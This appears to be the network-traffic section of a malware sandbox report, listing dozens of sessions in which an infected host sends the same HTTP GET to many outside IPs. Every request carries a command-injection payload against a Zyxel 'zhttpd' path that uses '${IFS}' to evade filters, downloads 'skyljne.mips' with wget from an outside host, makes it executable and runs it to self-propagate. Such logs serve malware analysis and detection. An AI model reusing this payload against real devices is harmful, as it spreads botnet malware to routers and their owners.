                                                Jan 12, 2024 18:16:10.150713921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1306192.168.2.234141435.231.113.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.150752068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1307192.168.2.2344436131.252.96.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.150793076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1308192.168.2.2339808195.38.196.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.150835991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1309192.168.2.2337270190.42.117.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.150882006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1310192.168.2.235520432.46.225.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.150911093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1311192.168.2.2344094167.37.134.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.150943995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1312192.168.2.2351156206.240.7.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.150995016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1313192.168.2.2358272106.140.176.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.151022911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1314192.168.2.235685461.0.196.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.151072979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1315192.168.2.2348592136.139.142.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.151113987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1316192.168.2.2343788216.204.188.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.151173115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1317192.168.2.2360364138.222.69.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.151220083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1318192.168.2.2353224115.77.57.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.151249886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1319192.168.2.235251271.56.153.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.151282072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1320192.168.2.23498844.104.250.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.151335955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1321192.168.2.233783066.228.5.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.151369095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1322192.168.2.2343714197.80.23.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.151401997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1323192.168.2.233718053.83.23.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.151459932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1324192.168.2.234525078.16.140.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.151504040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1325192.168.2.236026840.106.68.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.151531935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1326192.168.2.2354862118.146.38.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.151576996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1327192.168.2.233552624.166.247.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.151609898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1328192.168.2.2354994106.236.219.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.151644945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1329192.168.2.2360722190.51.68.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.151675940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1330192.168.2.234410427.164.70.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.151736021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1331192.168.2.2349604187.60.206.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.151777029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1332192.168.2.2344458141.130.115.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.155098915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1333192.168.2.2343880100.189.150.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.155119896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1334192.168.2.233818439.150.236.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.155152082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1335192.168.2.2333078126.76.128.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.155190945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1336192.168.2.233323865.230.117.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.155246973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1337192.168.2.234177242.208.16.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.155294895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1338192.168.2.23536702.115.34.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.155332088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1339192.168.2.2358536153.195.235.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.155364990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1340192.168.2.2353668192.163.198.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.163415909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1341192.168.2.2348616195.47.188.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.163450003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1342192.168.2.2338940201.185.58.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.163484097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1343192.168.2.2342540134.37.215.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.163518906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1344192.168.2.2345602119.246.2.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.163573027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1345192.168.2.2345538106.146.162.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.163619041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1346192.168.2.2349042185.5.24.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.163660049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1347192.168.2.2342774202.235.113.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.163712025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1348192.168.2.2346792185.82.237.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.163775921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1349192.168.2.2333432187.40.203.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.163784027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1350192.168.2.2357168135.34.193.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.163846970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1351192.168.2.2341470129.8.54.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.163886070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1352192.168.2.2342454163.108.188.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.163927078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1353192.168.2.233738484.252.243.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.163960934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1354192.168.2.235419031.176.179.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.163999081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1355192.168.2.2358142176.203.41.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.164026022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1356192.168.2.235371248.226.18.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.164046049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1357192.168.2.2337890109.23.230.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.164078951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1358192.168.2.2355374131.193.67.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.164134026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1359192.168.2.2344618205.131.53.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.164155006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1360192.168.2.2334098193.253.223.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.164179087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1361192.168.2.235557414.139.95.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.164233923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1362192.168.2.2345630158.239.227.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.164258003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1363192.168.2.234350247.231.225.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.164308071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1364192.168.2.234619247.162.150.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.164329052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1365192.168.2.236030452.217.139.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.164369106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1366192.168.2.2345578170.132.246.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.164400101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1367192.168.2.2359464146.88.253.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.164453983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1368192.168.2.2357422148.210.136.182443
                                                TimestampBytes transferredDirectionData
